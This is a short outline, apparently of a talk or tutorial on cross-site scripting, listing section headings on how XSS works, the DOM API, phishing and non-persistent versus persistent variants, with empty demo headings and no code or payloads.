XSS – from breeze to hurricane – I) Breeze and weapons review – XSS, how does it work? B) XSS and the DOM API

The most classic application: the phishing attack

Demo:

Non-persistent (volatile):

Persistent...
